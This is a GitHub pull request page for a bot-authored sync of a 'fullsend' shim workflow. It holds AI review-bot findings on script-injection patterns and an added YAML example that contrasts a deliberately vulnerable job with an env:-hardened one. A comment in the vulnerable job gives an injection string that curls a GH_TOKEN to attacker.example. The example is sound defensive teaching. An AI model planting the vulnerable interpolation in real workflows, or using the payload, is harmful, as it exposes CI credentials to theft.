
chore: update fullsend shim workflow #16

Merged

ralphbean merged 1 commit into main from fullsend/onboard on May 4, 2026

Conversation

@fullsend-ai-fullsend (Contributor)

This PR updates the fullsend shim workflow to match the current template in the .fullsend config repo.

The shim content has drifted from the template — this brings it back in sync.

@fullsend-ai-fullsend fullsend-ai-fullsend Bot requested a review from a team as a code owner May 4, 2026 15:25
fullsend-ai-review Bot commented May 4, 2026

Review: #16

Head SHA: a5d51c1
Timestamp: 2026-05-04T00:00:00Z
Outcome: comment-only

Summary

This PR consolidates per-role workflow dispatches (triage.yml, code.yml, review.yml, fix.yml) into a single dispatch.yml with a -f stage=<name> parameter, updates comments, and adds a new dispatch-gh-classify job for issue classification. The consolidation is mechanically consistent across the triage, code, review, and fix jobs. Two medium-severity findings relate to a semantic change in trigger_source values and a deviation from the file's established script-injection-prevention pattern in the new dispatch-gh-classify job. Neither is blocking, but both warrant attention.

Findings

Medium

  • [semantic-change] .github/workflows/fullsend.yaml:200,267 — trigger_source changed from hardcoded "bot"/"human" to the actual user login (github.event.review.user.login / github.event.comment.user.login). This is a behavioral change, not just a template sync. If dispatch.yml routes or authorizes based on the old "bot" / "human" string values, this will silently break that logic. Verify the downstream consumer expects username values.

  • [script-injection-pattern] .github/workflows/fullsend.yaml:280 — In the new dispatch-gh-classify payload step, ${{ github.repository }} is interpolated directly inside the run: block (--arg repo "${{ github.repository }}"). Every other job in this file carefully passes GitHub context expressions through env: variables to prevent script injection. While github.repository is not attacker-controlled and this is not exploitable, it breaks the established security pattern. Use an env var (e.g., SOURCE_REPO) for consistency.

Low

  • [inconsistent-dispatch] .github/workflows/fullsend.yaml:289-295 — dispatch-gh-classify dispatches directly to gh-classify.yml using --field, while every other job was consolidated to dispatch through dispatch.yml using -f. If gh-classify.yml is intentionally kept separate from the dispatch consolidation, a comment explaining why would help future readers.

  • [style] .github/workflows/fullsend.yaml:289-295 — dispatch-gh-classify's dispatch step uses --field (long form) while all other updated dispatch steps use -f (short form). Minor inconsistency.

Footer

Outcome: comment-only
This review applies to SHA a5d51c1059713ad4ef319db2b16f98953a80b5e7. Any push to the PR head clears this review and requires a new evaluation.

Previous run

Review: #16

Head SHA: 0dacba4
Timestamp: 2026-05-04T00:00:00Z
Outcome: approve

Summary

This PR consolidates four per-role dispatch targets (triage.yml, code.yml, review.yml, fix.yml) into a single dispatch.yml with a stage parameter, syncing the shim with the current .fullsend config template. All changes are mechanical and consistent across the four dispatch jobs. The pull_request_target security model is preserved, and environment-variable-based input handling correctly avoids script injection. No critical, high, or medium findings.

Findings

Info

  • [Correctness] dispatch-fix-bot / dispatch-fix-human — The trigger_source field changed semantics from a static type label ("bot" / "human") to the actual GitHub username (github.event.review.user.login / github.event.comment.user.login). This is a behavioral change that requires the downstream dispatch.yml to accept usernames rather than type labels. Since this PR syncs with the .fullsend template, the dispatcher presumably already expects this — but worth confirming the dispatcher was updated first.

Footer

Outcome: approve
This review applies to SHA 0dacba4. Any push to the PR head clears this review and requires a new evaluation.


Protected paths detected — this PR modifies files under one or more protected paths. The review agent cannot approve PRs that touch these paths. A human reviewer must approve this PR.

Protected files in this PR:

  • .github/workflows/fullsend.yaml
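
The env-variable pattern that both review runs refer to, shown as an added example rather than the repository's own fullsend.yaml (the workflow name, step names, the SOURCE_REPO / COMMENT_BODY / TRIGGER_SOURCE variable names, the permissions block and the inputs passed to dispatch.yml are assumptions for illustration). The first job interpolates GitHub context expressions directly into the run: script: the runner substitutes the expression text before bash ever parses the line, so a comment body containing a double quote and a semicolon becomes shell code, and the jq --arg quoting around it does not help because the damage happens earlier. The second job binds every expression through env:, so the shell only ever sees the content as a variable's value, and the dispatch step passes the resulting payload the same way.

```yaml
name: shim-pattern-example   # added example, not the project's shim workflow

on:
  issue_comment:
    types: [created]

permissions:
  actions: write   # assumption: needed for `gh workflow run` with GITHUB_TOKEN
  contents: read

jobs:
  # WEAK: ${{ }} expansion is performed by the runner before the shell starts,
  # so a comment body such as
  #   hello"; curl https://attacker.example/?t=$GH_TOKEN #
  # is spliced into the script source and executed with the job's credentials.
  # Wrapping the expression in quotes or passing it via `jq --arg` cannot fix
  # this, because the substitution happens before quoting is interpreted.
  weak-dispatch:
    runs-on: ubuntu-latest
    steps:
      - name: Build payload (vulnerable pattern, for contrast only)
        run: |
          jq -nc \
            --arg repo "${{ github.repository }}" \
            --arg body "${{ github.event.comment.body }}" \
            --arg trigger_source "${{ github.event.comment.user.login }}" \
            '{repo: $repo, body: $body, trigger_source: $trigger_source}'

  # HARDENED: every context value is bound to an environment variable by the
  # runner, and the script references only "$VAR". The shell treats the content
  # as data regardless of which characters it contains. github.repository is
  # not attacker-controlled, but it goes through env: too so that one rule
  # ("no ${{ }} inside run:") holds for the whole file.
  hardened-dispatch:
    runs-on: ubuntu-latest
    env:
      SOURCE_REPO: ${{ github.repository }}
      COMMENT_BODY: ${{ github.event.comment.body }}
      TRIGGER_SOURCE: ${{ github.event.comment.user.login }}
    steps:
      - name: Build payload (hardened pattern)
        id: payload
        run: |
          # -c emits a single JSON line; newlines inside the body are escaped
          # as \n, so the value is safe to write to GITHUB_OUTPUT as one line.
          payload=$(jq -nc \
            --arg repo "$SOURCE_REPO" \
            --arg body "$COMMENT_BODY" \
            --arg trigger_source "$TRIGGER_SOURCE" \
            '{repo: $repo, body: $body, trigger_source: $trigger_source}')
          echo "payload=$payload" >> "$GITHUB_OUTPUT"

      - name: Dispatch to the consolidated workflow (assumed inputs)
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          PAYLOAD: ${{ steps.payload.outputs.payload }}
        run: |
          # Step outputs are context values as well, so they also arrive via env:.
          # `stage` and `payload` are assumed workflow_dispatch inputs of dispatch.yml.
          gh workflow run dispatch.yml \
            -f stage=triage \
            -f payload="$PAYLOAD"
```

A quick way to audit a workflow for the weak form is to grep for `${{` on any line that sits inside a `run:` block; in a file that follows the pattern above, the only `${{` occurrences are under `env:`, `with:`, `if:` or other structured keys, never in script text.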

@fullsend-ai-review fullsend-ai-review Bot left a comment

See the review comment for full details.
@ralphbean ralphbean added this pull request to the merge queue May 4, 2026
Merged via the queue into main with commit 3da0d72 May 4, 2026
11 checks passed
@ralphbean ralphbean deleted the fullsend/onboard branch May 4, 2026 19:56